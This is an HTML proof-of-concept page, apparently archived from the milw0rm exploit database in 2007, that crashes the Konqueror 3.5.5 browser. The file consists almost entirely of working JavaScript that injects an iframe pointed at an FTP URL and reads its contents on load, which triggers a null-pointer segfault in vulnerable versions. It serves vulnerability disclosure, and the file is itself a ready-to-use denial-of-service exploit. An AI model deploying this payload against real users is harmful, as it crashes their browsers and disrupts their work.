28 lines
No EOL
753 B
HTML
28 lines
No EOL
753 B
HTML
<html>
|
|
<body>
|
|
|
|
Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.<p>
|
|
Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.<p>
|
|
<p>
|
|
|
|
<script>
|
|
read_iframe = function(iframe_name) {
|
|
var banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;
|
|
alert(banner);
|
|
}
|
|
|
|
var iframe = document.createElement("IFRAME");
|
|
iframe.setAttribute("src", 'ftp://localhost/anything');
|
|
iframe.setAttribute("name", 'myiframe');
|
|
iframe.setAttribute("id", 'myiframe');
|
|
iframe.setAttribute("onload", 'read_iframe("myiframe")');
|
|
iframe.style.width = "100px";
|
|
iframe.style.height = "100px";
|
|
|
|
document.body.appendChild(iframe);
|
|
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2007-03-05] |